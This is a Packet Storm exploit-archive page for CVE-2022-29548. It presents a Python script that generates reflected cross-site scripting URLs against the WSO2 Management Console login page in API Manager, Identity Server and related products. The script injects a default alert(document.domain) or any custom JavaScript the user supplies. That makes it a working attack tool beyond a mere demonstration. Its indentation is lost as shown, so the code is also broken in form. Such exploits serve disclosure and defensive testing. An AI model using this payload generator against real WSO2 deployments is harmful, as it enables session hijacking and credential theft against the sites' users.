exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WSO2 Management Console Cross Site Scripting

WSO2 Management Console Cross Site Scripting
Posted Jun 27, 2022
Authored by cxosmo

WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

tags | exploit, xss
advisories | CVE-2022-29548
SHA-256 | 209bab2c58dfce94eee51b7eb0b2675f337036396419fe6c59da3c84e1861a31

WSO2 Management Console Cross Site Scripting

Change Mirror Download
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
# Date: 21 Apr 2022
# Exploit Author: cxosmo
# Vendor Homepage: https://wso2.com
# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)
# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;
# API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;
# API Microgateway 2.2.0;
# Data Analytics Server 3.2.0;
# Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;
# IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;
# Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;
# Identity Server Analytics 5.5.0 and 5.6.0;
# WSO2 Micro Integrator 1.0.0.
# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)
# CVE: CVE-2022-29548

import argparse
import logging
import urllib.parse

# Global variables
VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
DEFAULT_PAYLOAD = "alert(document.domain)"

# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()

def generate_payload(url, custom_payload=False):
log.info(f"Generating payload for {url}...")
if custom_payload:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")
else:
log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")

def clean_url_input(url):
if url.count("/") > 2:
return f"{url.split('/')[0]}//{url.split('/')[2]}"
else:
return url

def check_payload(payload):
encoded_characters = ['"', '<', '>']
if any(character in payload for character in encoded_characters):
log.info(f"Unsupported character(s) (\", <, >) found in payload.")
return False
else:
return urllib.parse.quote(payload)

if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",
required="True", action="store")
parser.add_argument("-p", "--payload",
help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",
action="store", default=False)
args = parser.parse_args()

# Clean user target input
args.target = clean_url_input(args.target.lower())

# Check for unsupported characters in custom payload; URL-encode as required
if args.payload:
args.payload = check_payload(args.payload)
if args.payload:
generate_payload(args.target, args.payload)
else:
generate_payload(args.target)


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close